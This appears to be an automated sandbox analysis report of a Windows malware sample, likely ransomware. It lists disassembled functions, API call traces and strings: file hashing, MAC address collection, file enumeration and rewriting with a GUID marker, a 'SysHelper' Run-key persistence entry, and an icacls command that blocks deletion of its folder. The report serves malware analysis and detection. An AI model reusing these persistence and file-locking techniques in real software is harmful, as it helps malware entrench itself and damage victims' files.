                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                • _memset.LIBCMT ref: 0040E98E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                • _sprintf.LIBCMT ref: 0040E9D3
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                • String ID: %.2X
                • API String ID: 1084002244-213608013
                • Opcode ID: 2a2c6309cc7f3088b6ad090895b6028a962ed151306464ff2d3e3b9a596104f8
                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                • Opcode Fuzzy Hash: 2a2c6309cc7f3088b6ad090895b6028a962ed151306464ff2d3e3b9a596104f8
                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1556 40eaa0-40eb09 call 4156d0 CryptAcquireContextW 1559 40eb0b-40eb17 call 430eca 1556->1559 1560 40eb1c-40eb34 CryptCreateHash 1556->1560 1559->1560 1562 40eb36-40eb42 call 430eca 1560->1562 1563 40eb47-40eb56 CryptHashData 1560->1563 1562->1563 1564 40eb58-40eb64 call 430eca 1563->1564 1565 40eb69-40eb87 CryptGetHashParam 1563->1565 1564->1565 1568 40eb89-40eb95 call 430eca 1565->1568 1569 40eb9a-40ebcc call 420be4 call 42b420 CryptGetHashParam 1565->1569 1568->1569 1575 40ebce-40ebda call 430eca 1569->1575 1576 40ebdf 1569->1576 1575->1576 1578 40ebe1-40ebe4 1576->1578 1579 40ebe6-40ec00 call 4204a6 1578->1579 1580 40ec38-40ec67 call 422110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 40ec02-40ec11 call 413ea0 1579->1585 1586 40ec13-40ec19 1579->1586 1585->1578 1588 40ec20-40ec25 1586->1588 1588->1588 1590 40ec27-40ec36 call 413ea0 1588->1590 1590->1578
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                • _memset.LIBCMT ref: 0040EBB4
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                • _sprintf.LIBCMT ref: 0040EBF4
                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                • String ID: %.2X
                • API String ID: 1637485200-213608013
                • Opcode ID: 93922072d48d22cd6d6b6ae8233d720f7ababcdf9d90782a77bd94aa60d24f48
                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                • Opcode Fuzzy Hash: 93922072d48d22cd6d6b6ae8233d720f7ababcdf9d90782a77bd94aa60d24f48
                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1593 40e670-40e697 call 420c62 * 2 1598 40e6b4-40e6c2 GetAdaptersInfo 1593->1598 1599 40e699-40e6b3 call 421f2d call 420bed 1593->1599 1600 40e6c4-40e6d9 call 420bed call 420c62 1598->1600 1601 40e6db-40e6e8 GetAdaptersInfo 1598->1601 1600->1599 1600->1601 1604 40e744-40e754 call 420bed 1601->1604 1605 40e6ea-40e73c call 4204a6 call 421f2d * 2 1601->1605 1619 40e741 1605->1619 1619->1604
                APIs
                • _malloc.LIBCMT ref: 0040E67F
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040E68B
                • _wprintf.LIBCMT ref: 0040E69E
                • _free.LIBCMT ref: 0040E6A4
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                • _free.LIBCMT ref: 0040E6C5
                • _malloc.LIBCMT ref: 0040E6CD
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                • _sprintf.LIBCMT ref: 0040E720
                • _wprintf.LIBCMT ref: 0040E732
                • _wprintf.LIBCMT ref: 0040E73C
                • _free.LIBCMT ref: 0040E745
                Strings
                • Address: %s, mac: %s, xrefs: 0040E72D
                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                • API String ID: 3901070236-1604013687
                • Opcode ID: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                • Opcode Fuzzy Hash: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1997 40fb98-40fb9f 1998 40fba0-40fbb9 1997->1998 1998->1998 1999 40fbbb-40fbcf 1998->1999 2000 40fbd1 1999->2000 2001 40fbd3-40fc02 PathAppendW call 418400 1999->2001 2000->2001 2004 40fc04-40fc0c call 422587 2001->2004 2005 40fc0f-40fc29 2001->2005 2004->2005 2007 40fc49-40fc4c 2005->2007 2008 40fc2b-40fc2f 2005->2008 2009 40fc4f-40fc6b PathFileExistsW 2007->2009 2008->2009 2011 40fc31-40fc47 call 4205a0 2008->2011 2012 40fc6d-40fc86 call 420c62 2009->2012 2013 40fcdf-40fce5 2009->2013 2011->2009 2023 40fc88 2012->2023 2024 40fc8a-40fc9f lstrcpyW 2012->2024 2017 40fcf0-40fd07 call 417140 2013->2017 2018 40fce7-40fced call 422587 2013->2018 2026 40fd09 2017->2026 2027 40fd0b-40fd20 FindFirstFileW 2017->2027 2018->2017 2023->2024 2028 40fca1 2024->2028 2029 40fca3-40fcdc lstrcatW call 414690 call 40f0e0 call 420bed 2024->2029 2026->2027 2030 40fd30-40fd4c 2027->2030 2031 40fd22-40fd2d call 422587 2027->2031 2028->2029 2029->2013 2035 40fd52-40fd55 2030->2035 2036 410072-410076 2030->2036 2031->2030 2041 40fd60-40fd6b 2035->2041 2037 410086-4100a4 2036->2037 2038 410078-410083 call 422587 2036->2038 2043 4100b1-4100c9 2037->2043 2044 4100a6-4100ae call 422587 2037->2044 2038->2037 2046 40fd70-40fd76 2041->2046 2050 4100d6-4100ee 2043->2050 2051 4100cb-4100d3 call 422587 2043->2051 2044->2043 2052 40fd96-40fd98 2046->2052 2053 40fd78-40fd7b 2046->2053 2062 4100f0-4100f8 call 422587 2050->2062 2063 4100fb-41010b 2050->2063 2051->2050 2055 40fd9b-40fd9d 2052->2055 2059 40fd92-40fd94 2053->2059 2060 40fd7d-40fd85 2053->2060 2064 410052-410065 FindNextFileW 2055->2064 2065 40fda3-40fdae 2055->2065 2059->2055 2060->2052 2061 40fd87-40fd90 2060->2061 2061->2046 2061->2059 2062->2063 2064->2041 2068 41006b-41006c FindClose 2064->2068 2069 40fdb0-40fdb6 2065->2069 2068->2036 2071 40fdd6-40fdd8 2069->2071 2072 40fdb8-40fdbb 2069->2072 2075 40fddb-40fddd 2071->2075 2073 40fdd2-40fdd4 2072->2073 2074 40fdbd-40fdc5 2072->2074 2073->2075 2074->2071 2076 40fdc7-40fdd0 2074->2076 2075->2064 2077 40fde3-40fdea 2075->2077 2076->2069 2076->2073 2078 40fdf0-40fe71 call 417140 call 415ae0 call 414690 call 413b70 2077->2078 2079 40fec2-40fecc 2077->2079 2101 40fe81-40fea9 2078->2101 2102 40fe73-40fe7e call 422587 2078->2102 2081 40feda-40fede 2079->2081 2082 40fece-40fed5 call 411ab0 2079->2082 2081->2064 2083 40fee4-40ff13 call 414690 2081->2083 2082->2081 2091 40ff15-40ff17 2083->2091 2092 40ff19-40ff1f 2083->2092 2094 40ff31-40ff6a call 415ae0 PathFindExtensionW 2091->2094 2095 40ff22-40ff2b 2092->2095 2103 40ff9a-40ffa8 2094->2103 2104 40ff6c 2094->2104 2095->2095 2097 40ff2d-40ff2f 2095->2097 2097->2094 2101->2064 2108 40feaf-40febd call 422587 2101->2108 2102->2101 2106 40ffda-40ffde 2103->2106 2107 40ffaa 2103->2107 2109 40ff70-40ff74 2104->2109 2110 40ffe0-40ffe9 2106->2110 2111 41003a-410042 2106->2111 2113 40ffb0-40ffb4 2107->2113 2108->2064 2115 40ff76-40ff78 2109->2115 2116 40ff7a 2109->2116 2117 40ffeb 2110->2117 2118 40ffed-40fff9 call 421c02 2110->2118 2122 410044-41004c call 422587 2111->2122 2123 41004f 2111->2123 2119 40ffb6-40ffb8 2113->2119 2120 40ffba 2113->2120 2124 40ff7c-40ff88 call 421c02 2115->2124 2116->2124 2117->2118 2118->2111 2135 40fffb-41000b 2118->2135 2127 40ffbc-40ffce call 421c02 2119->2127 2120->2127 2122->2123 2123->2064 2133 40ff93 2124->2133 2134 40ff8a-40ff8f 2124->2134 2127->2111 2141 40ffd0-40ffd5 2127->2141 2138 40ff97 2133->2138 2134->2109 2137 40ff91 2134->2137 2139 41000d 2135->2139 2140 41000f-410026 call 421c02 2135->2140 2137->2138 2138->2103 2139->2140 2140->2111 2145 410028-410035 call 4111c0 2140->2145 2141->2113 2143 40ffd7 2141->2143 2143->2106 2145->2111
                APIs
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                • String ID:
                • API String ID: 3232302685-0
                • Opcode ID: b41a7e3721ab52c53a2d97f811321f5149e05d4f66678be3c259ae365218fb02
                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                • Opcode Fuzzy Hash: b41a7e3721ab52c53a2d97f811321f5149e05d4f66678be3c259ae365218fb02
                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 985 411cd0-411d1a call 42f7c0 RegOpenKeyExW 988 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 985->988 989 412207-412216 985->989 992 411d93-411d9c 988->992 993 411d8f-411d91 988->993 995 411da0-411da9 992->995 994 411daf-411dcb call 415c10 993->994 999 411dd1-411df8 lstrlenA call 413520 994->999 1000 411e7c-411e87 994->1000 995->995 996 411dab-411dad 995->996 996->994 1006 411e28-411e2c 999->1006 1007 411dfa-411dfe 999->1007 1002 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 411e89-411e91 call 422587 1000->1003 1014 411f36-411f38 1002->1014 1015 411f3a-411f3f 1002->1015 1003->1002 1012 411e3c-411e50 PathFileExistsW 1006->1012 1013 411e2e-411e39 call 422587 1006->1013 1010 411e00-411e08 call 422587 1007->1010 1011 411e0b-411e23 call 4145a0 1007->1011 1010->1011 1011->1006 1012->1000 1021 411e52-411e57 1012->1021 1013->1012 1019 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 411f40-411f49 1015->1020 1032 411f98-411fa0 1019->1032 1033 411fce-411fe9 1019->1033 1020->1020 1025 411f4b-411f4d 1020->1025 1026 411e59-411e5e 1021->1026 1027 411e6a-411e6e 1021->1027 1025->1019 1026->1027 1028 411e60-411e65 call 414690 1026->1028 1027->989 1030 411e74-411e77 1027->1030 1028->1027 1034 4121ff-412204 call 422587 1030->1034 1035 411fa2-411fa4 1032->1035 1036 411fa6-411faf 1032->1036 1038 411feb-411fed 1033->1038 1039 411fef-411ff8 1033->1039 1034->989 1040 411fbf-411fc9 call 415c10 1035->1040 1042 411fb0-411fb9 1036->1042 1043 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 412000-412009 1039->1044 1040->1033 1042->1042 1045 411fbb-411fbd 1042->1045 1050 4121d1-4121d5 1043->1050 1051 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1051 1044->1044 1047 41200b-41200d 1044->1047 1045->1040 1047->1043 1053 4121e2-4121fa 1050->1053 1054 4121d7-4121df call 422587 1050->1054 1058 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1058 1059 412109-412110 call 413260 1051->1059 1053->989 1055 4121fc 1053->1055 1054->1053 1055->1034 1064 4121b2-4121b8 1058->1064 1065 4121aa-4121b0 GetLastError 1058->1065 1059->1058 1066 4121c0-4121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                • _memset.LIBCMT ref: 00411D3B
                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                • GetCommandLineW.KERNEL32 ref: 00411EB4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                • UuidCreate.RPCRT4(?), ref: 00411EFC
                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                • DeleteFileW.KERNEL32(?), ref: 00412036
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                • _memset.LIBCMT ref: 00412090
                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                • lstrlenW.KERNEL32(?), ref: 004120D7
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                • _memset.LIBCMT ref: 00412120
                • SetLastError.KERNEL32(00000000), ref: 00412146
                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                • API String ID: 2589766509-1182136429
                • Opcode ID: f980b6ffa76a6092ffbd2ad192a39922b734e241aa47311fe50dc2cde2940b2a
                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                • Opcode Fuzzy Hash: f980b6ffa76a6092ffbd2ad192a39922b734e241aa47311fe50dc2cde2940b2a
                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1067 4111c0-41121d CreateFileW 1068 411223-411232 GetFileSizeEx 1067->1068 1069 4118eb-4118fb 1067->1069 1070 4112a3-4112be VirtualAlloc 1068->1070 1071 411234 1068->1071 1074 4112c0-4112d5 call 42b420 1070->1074 1075 41131a-411331 CloseHandle 1070->1075 1072 411236-41123a 1071->1072 1073 41123c-411281 CloseHandle call 413100 call 4159d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 411287-4112a2 call 422587 1073->1091 1081 4113b1 1074->1081 1082 4112db-4112de 1074->1082 1085 4113b7-4113ef SetFilePointer 1081->1085 1083 4112e0-4112e3 1082->1083 1084 4112e9-41130a SetFilePointerEx 1082->1084 1083->1081 1083->1084 1087 411332-41134d ReadFile 1084->1087 1088 41130c-411314 VirtualFree 1084->1088 1089 4113f5-41140d ReadFile 1085->1089 1090 4115bf 1085->1090 1087->1088 1092 41134f-411354 1087->1092 1088->1075 1093 411440-411445 1089->1093 1094 41140f-41143f VirtualFree CloseHandle call 412d50 1089->1094 1095 4115c5-4115d9 SetFilePointerEx 1090->1095 1092->1088 1097 411356-411359 1092->1097 1093->1090 1099 41144b-41146b 1093->1099 1095->1094 1100 4115df-4115eb 1095->1100 1097->1085 1102 41135b-411377 call 412c40 call 417060 1097->1102 1104 411471-4115a8 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40c5c0 call 412d10 call 412d50 call 40bbd0 call 40bd50 call 413ff0 call 412f70 call 40c070 SetFilePointer 1099->1104 1105 411718-4117d9 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40bbd0 call 40bd50 call 412f70 call 40c070 1099->1105 1106 4115ed-4115fc WriteFile 1100->1106 1107 41160e-411643 call 4130b0 call 412840 1100->1107 1130 4113a7-4113af call 412d50 1102->1130 1131 411379-4113a6 VirtualFree CloseHandle call 412d50 1102->1131 1182 4117e1-41182e call 412d50 call 412c40 call 412bf0 call 40cba0 1104->1182 1195 4115ae-4115ba call 412d50 * 2 1104->1195 1105->1182 1106->1094 1111 411602-41160b call 422110 1106->1111 1127 411645 1107->1127 1128 411647-41165a WriteFile call 412d50 1107->1128 1111->1107 1127->1128 1128->1094 1144 411660-411680 lstrlenA WriteFile 1128->1144 1130->1085 1144->1094 1147 411686-4116de CloseHandle call 413100 call 4159d0 MoveFileW 1144->1147 1163 4116e4-411717 VirtualFree call 413210 call 412d50 1147->1163 1164 4118a7-4118d3 call 413210 call 412d50 1147->1164 1184 4118e3-4118e6 1164->1184 1185 4118d5-4118dd VirtualFree 1164->1185 1203 411830-411832 1182->1203 1204 41186e-4118a6 VirtualFree CloseHandle call 412d50 * 2 1182->1204 1184->1069 1186 4118e8-4118e9 CloseHandle 1184->1186 1185->1184 1186->1069 1195->1090 1203->1204 1205 411834-41185b WriteFile 1203->1205 1205->1204 1207 41185d-411869 call 412d50 1205->1207 1207->1095
                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                • _memset.LIBCMT ref: 004112C8
                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                • MoveFileW.KERNEL32(?,?), ref: 004116D6
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                • API String ID: 254274740-1186676987
                • Opcode ID: 78eba2603e38d113a3cc7409a85c05b91dfbb622b821b3ba771994967f615fc3
                • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                • Opcode Fuzzy Hash: 78eba2603e38d113a3cc7409a85c05b91dfbb622b821b3ba771994967f615fc3
                • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1213 412220-41228a call 42f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 4122bd-4122d1 K32EnumProcesses 1213->1216 1217 41228c-4122ba LoadLibraryW GetProcAddress * 3 1213->1217 1218 4122d3-4122de 1216->1218 1219 4122df-4122ec 1216->1219 1217->1216 1220 412353-41235b 1219->1220 1221 4122ee 1219->1221 1222 4122f0-412308 OpenProcess 1221->1222 1223 412346-412351 CloseHandle 1222->1223 1224 41230a-41231a K32EnumProcessModules 1222->1224 1223->1220 1223->1222 1224->1223 1225 41231c-412339 K32GetModuleBaseNameW call 420235 1224->1225 1227 41233e-412343 1225->1227 1227->1223 1228 412345 1227->1228 1228->1223
                APIs
                • GetCommandLineW.KERNEL32 ref: 00412235
                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
